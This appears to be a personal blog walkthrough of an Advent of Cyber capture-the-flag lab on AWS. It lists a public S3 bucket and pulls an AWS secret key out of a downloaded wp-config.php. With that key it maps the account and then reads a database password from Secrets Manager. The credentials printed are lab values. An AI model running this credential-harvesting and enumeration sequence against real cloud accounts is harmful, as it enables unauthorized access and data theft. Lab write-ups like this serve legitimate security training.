Advent Of Cyber 3 - Day 17

Posted on Dec 17, 2021
tl;dr: AWS

Getting ready

Today it’s about exploring and exploiting AWS S3 buckets, using it to extract information and use that to gain further leverage.

Get the AWS CLI:

sudo apt install -y awscli

verify that it works:

aws s3 ls s3://irs-form-990/ --no-sign-request

it should start printing a long list with dates and XML files, hit CTRL+C after a while because it’s a pretty long list.

Downloading stuff

Using cURL or aws-cli


aws s3 cp s3://irs-form-990/201101319349101615_public.xml . --no-sign-request

AWS recon

aws configure --profile (PROFILENAME)

adds files to .aws/config and .aws/credentials in the home-dir.

after adding the access keys to the profile, commands can be executed with:

aws s3 ls --profile (PROFILENAME)

OBS! Never store a set of access keys in the default profile, the risk of running commands on the wrong account is smaller this way.

other recon techniques:

Finding the account ID belonging to an access key: aws sts get-access-key-info --access-key-id AKIAEXAMPLE

Determining the Username the access key you’re using belongs to: aws sts get-caller-identity --profile (PROFILENAME)

Listing all the EC2 instances running in an account: aws ec2 describe-instances --output text --profile (PROFILENAME)

Listing all the EC2 instances running in an account in a different region: aws ec2 describe-instances --output text --region us-east-1 --profile (PROFILENAME)


identifying a unique identifier, the format is: arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>


The grinch got hold of too much information again somehow, and we need to find out how.

the clue is an image HR sent out about a new portal site:


looking at the source code it links to:

<img src="" style="width:538px">

where the bucket seems to be:

lets see if we can enumerate it a bit and list some more files.

└─$ aws s3 ls s3:// --no-sign-request

2021-11-13 16:06:51       6148 .DS_Store
2021-11-13 13:43:03     108420 0vF39p3.png
2021-11-27 12:55:21     705191 AWSConsole.png
2021-11-13 13:43:03       5652 aws-logo.png
2021-11-13 16:06:51         68 flag.txt
2021-11-13 16:06:51    2349068 flyer.png
2021-11-13 13:43:03      92531 presents.jpg
2021-11-13 13:43:03       4680 tree.png
2021-11-24 00:52:22   16556739

there seems to be a couple of intresting files, lets download them and analyze further:

└─$ aws s3 cp s3:// ./ --recursive --no-sign-request                             2 ⨯
download: s3:// to ./flag.txt
download: s3:// to ./aws-logo.png
download: s3:// to ./.DS_Store
download: s3:// to ./tree.png
download: s3:// to ./presents.jpg
download: s3:// to ./0vF39p3.png
download: s3:// to ./AWSConsole.png
download: s3:// to ./flyer.png
download: s3:// to ./

contents of flag.txt : It's easy to get your elves data when you leave it so easy to find!

the interesting file we want to investigate more is:

unzip the file and go through the files. Inside the unpacked folder is a file called wp-config.php and it has some juicy credentials:

/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', '');
define('S3_UPLOADS_SECRET', 'Y+2fQBoJ+X9N0GzT4dF5kWE0ZX03n/KcYxkS1Qmc');
define('S3_UPLOADS_REGION', 'us-east-1');


Finding the AWS Account ID the access-key works with:

└─$ aws configure --profile thm-day17

AWS Secret Access Key [None]: Y+2fQBoJ+X9N0GzT4dF5kWE0ZX03n/KcYxkS1Qmc
Default region name [None]: us-east-1
Default output format [None]:

aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI--profile thm-day17
    "Account": "019181489476"

Finding the Username of the account:

aws sts get-caller-identity --profile thm-day17
    "UserId": "AIDAQI52OJVCFHT3E73BO",
    "Account": "019181489476",
    "Arn": "arn:aws:iam::019181489476:user/"


Find the name of the EC2 instance:

aws ec2 describe-instances --output text --profile thm-day17

TAGS    aws:cloudformation:stack-id     arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7
TAGS    aws:cloudformation:logical-id   Instance
TAGS    created_by      Elf McHR
TAGS    aws:cloudformation:stack-name   HR-Portal
TAGS    Name    HR-Portal

the interesting parts are under TAGS , where we see that the name is HR-Portal

finding the database password stored in Secrets Manager:

aws secretsmanager list-secrets --profile thm-day17
    "SecretList": [
            "ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
            "Name": "HR-Password",                                               
            "Description": "Portal DB Secret",
            "LastChangedDate": 1637717347.812,
            "LastAccessedDate": 1639872000.0,
            "Tags": [
                    "Key": "aws:cloudformation:stack-name",
                    "Value": "HR-Portal" 
                    "Key": "aws:cloudformation:logical-id",
                    "Value": "FalseSecret"
                    "Key": "aws:cloudformation:stack-id",
                    "Value": "arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7"
                    "Key": "created_by", 
                    "Value": "Elf McHR"
                    "Key": "Name",
                    "Value": "Payroll"
            "SecretVersionsToStages": {
                "70630b3c-4fbe-4a24-885d-18445bd808b1": [
                "a702190e-69f7-4a8a-81fd-3d20b486657a": [
            "CreatedDate": 1636807016.521

aws secretsmanager get-secret-value --secret-id HR-Password
    "ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
    "Name": "HR-Password",
    "VersionId": "70630b3c-4fbe-4a24-885d-18445bd808b1",
    "SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.",
    "VersionStages": [
    "CreatedDate": 1637717347.718

Sneaky santa keeping the DB close, time to find a datacenter closer to the north-pole. Going by the list on aws-docs the region eu-north-1 should be closer to where santa is.

└─$ aws secretsmanager get-secret-value --secret-id HR-Password --region eu-north-1
    "ARN": "arn:aws:secretsmanager:eu-north-1:019181489476:secret:HR-Password-KIJEvK",
    "Name": "HR-Password",
    "VersionId": "f806c3cd-ea20-4a1a-948f-80927f3ad366",
    "SecretString": "Winter2021!",
    "VersionStages": [
    "CreatedDate": 1636809979.996

What a classic password :D : Winter2021!